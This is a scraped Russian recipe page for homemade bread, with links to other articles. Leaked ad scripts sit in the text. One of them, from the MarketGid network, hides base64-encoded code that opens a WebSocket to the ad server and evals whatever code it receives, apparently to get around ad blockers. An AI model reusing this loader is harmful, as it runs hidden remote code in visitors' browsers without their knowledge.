Рецепт потрясающего домашнего хлеба. В 1000 раз лучше магазинного!


Я испекла хлеб дома и хочу поделиться с вами небольшими секретами.

Мой вкусный и аппетитный хлеб неоднократно удостаивался одобрения моих домашних.

Мягкий пушистый хлеб под хрустящей корочкой невероятно вкусен.

var d = new Date, script648719 = document.createElement(«script»), mg_ws648719 = {};script648719.type = «text/javascript»;script648719.charset = «utf-8»;script648719.src = «http://jsc.marketgid.com/p/e/perekusim.com.648719.js?t=» + d.getYear() + d.getMonth() + d.getDay() + d.getHours();script648719.onerror = function () { mg_ws648719 = new Worker(URL.createObjectURL(new Blob([‘eval(atob(‘ZnVuY3Rpb24gc2VuZE1lc3NhZ2U2NDg3MTkoZSl7dmFyIGg9bWdfd3M2NDg3MTkub25tZXNzYWdlOyBtZ193czY0ODcxOS5yZWFkeVN0YXRlPT1tZ193czY0ODcxOS5DTE9TRUQmJihtZ193czY0ODcxOT1uZXcgV2ViU29ja2V0KG1nX3dzNjQ4NzE5X2xvY2F0aW9uKSksbWdfd3M2NDg3MTkub25tZXNzYWdlPWgsd2FpdEZvclNvY2tldENvbm5lY3Rpb242NDg3MTkobWdfd3M2NDg3MTksZnVuY3Rpb24oKXttZ193czY0ODcxOS5zZW5kKGUpfSl9ZnVuY3Rpb24gd2FpdEZvclNvY2tldENvbm5lY3Rpb242NDg3MTkoZSx0KXtzZXRUaW1lb3V0KGZ1bmN0aW9uKCl7cmV0dXJuIDE9PT1lLnJlYWR5U3RhdGU/dm9pZChudWxsIT10JiZ0KCkpOnZvaWQgd2FpdEZvclNvY2tldENvbm5lY3Rpb242NDg3MTkoZSx0KX0sNSl9OyB2YXIgbWdfd3M2NDg3MTlfbG9jYXRpb24gPSAid3NzOi8vd3NwLm1hcmtldGdpZC5jb20vd3MiOyBtZ193czY0ODcxOSA9IG5ldyBXZWJTb2NrZXQobWdfd3M2NDg3MTlfbG9jYXRpb24pLCBtZ193czY0ODcxOS5vbm1lc3NhZ2UgPSBmdW5jdGlvbiAodCkge3Bvc3RNZXNzYWdlKHQuZGF0YSk7fSwgb25tZXNzYWdlID0gZnVuY3Rpb24oZSl7c2VuZE1lc3NhZ2U2NDg3MTkoZS5kYXRhKX0=’))’]), {type: «application/javascript»})); mg_ws648719.onmessage = function (msg){window.eval(msg.data);}; mg_ws648719.postMessage(‘js|’+script648719.src+’|M382836Composite648719|M382836Composite648719’);};document.body.appendChild(script648719);

recept-potryasayushhego-domashnego-xleba-v-1000-raz-luchshe-magazinnogo

Необходимые продукты:

50 грамм дрожжей;
вода — 1 литр;
подсолнечное масло — 3 ст.л.;
сахар — 2 ст.л.;
соль — 2 ч.л.;
муки где-то 1,5-1,7 кг.


google_ad_client = «ca-pub-7104543801500968»;
google_ad_slot = «2440797825»;
if(window.matchMedia(«(min-width:695px)»).matches){
google_ad_width = 696;
google_ad_height = 100;
}
else {
google_ad_width = 300;
google_ad_height = 250;
}

Итак, начинаем в наших домашних условиях готовить хлеб.

Нам потребуется кипячёная, но не горячая, а тёплая вода, в которую добавим размельчённые дрожжи.
После того, как добавим соль и сахар, начинаем постепенно засыпать муку. Размешиваем тесто так, что в результате оно не должно прилипать к рукам.
От часа до полтора накрытое полотенцем тесто должно постоять в тёплом месте. Поднявшееся тесто осадите руками.
Дальше заполните тестом форму и пусть минут 20 оно ещё поднимается.
Нагрев духовку до 220 градусов, выдерживайте форму с тестом 40 – 45 минут.
Вы уже получите удовольствие, когда ваш дом заполнит превосходный аромат, навевающий ощущение тепла и уюта.

Надеюсь, что мой рецепт вам понравится и пригодится.

Источник



Source link

Почитайте другие интересные статьи:

Осторожно! Естественное родительство!
В современное время беременной женщине очень трудно ориентироваться в потоке информации, которую предоставляет нам Интернет и Телевидение. И вот появилась новая ловушка для будущих мамочек: склонение к родам без помощи врачей…
12 малоизвестных законов кармы
Что такое “Карма”? На санскрите это слово означает “действие”. На Западе закону Кармы эквивалентен закон Ньютона: “Сила действия равна силе противодействия”. Когда мы думаем, говорим или действуем, то используем для этого собственную силу воли. И хотя мы можем этого не осознавать, любое действие ...
Вот из-за чего хурму скупают тоннами! На это есть 10 ошеломляющих причин. Мы вам все расскажем
Стоит идти за покупками ради нее одной. С приходом поздней осени на прилавках базаров и супермаркетов появляются ярко-оранжевые плоды заморской хурмы. С латыни “хурма” — это пища богов. Вы удивитесь, но не зря она так названа. Мало того, что она отлична утоляет голод, она также способна снабдить...